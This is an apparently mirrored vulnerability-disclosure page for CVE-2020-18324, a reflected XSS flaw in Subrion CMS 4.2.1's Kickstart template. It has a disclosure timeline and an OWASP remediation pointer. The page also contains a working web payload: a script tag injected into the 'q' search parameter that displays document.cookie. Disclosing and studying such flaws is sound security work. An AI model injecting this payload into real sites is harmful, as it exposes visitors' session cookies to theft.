CVE-2020-18324 PoC — Subrion CMS 跨站脚本漏洞

Source

https://github.com/hamm0nz/CVE-2020-18324

Associated Vulnerability

Title:Subrion CMS 跨站脚本漏洞 (CVE-2020-18324)
Description:Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.1 via the q parameter in the Kickstart template.

Description

Exploit PoC for CVE-2020-18324

Readme


# Subrion CMS 4.2.1 – Reflected XSS vulnerability in Kickstart template 
# Description
Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites.

The Reflected Cross-site Scripting vulnerability was discovered in the "Kickstart" web application template of the Subrion CMS v.4.2.1 via the "search" component, which allows a remote attacker to inject arbitrary JavaScript.

**Date**: 22-02-2022 \
**Software Link:** https://subrion.org \
**Exploit Author**: HaMM0nz \
**CVE**: CVE-2020-18324 \
**Category:** Web Application

# Proof of Concept
1. Navigate to Subrion Kickstart template
2. Inject <script>alert(document.cookie);</script> into “q” parameter, in PoC exploit will be https://localhost/search/?q=<script>alert(document.cookie);</script>

# Timeline
**Discovery and report** : 24 June 2019 \
**CVE ID was assigned** : 11 Aug 2021 \
**Public** : 22 February 2022
# Solution
Consider complying to the OWASP's XSS prevention guidelines. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

File Snapshot


 [4.0K]  /data/pocs/8bd4366c75beef244c22c0a21046ff439a7528c6
├── [1.0M]  CVE-2020-18324.pdf
└── [1.1K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!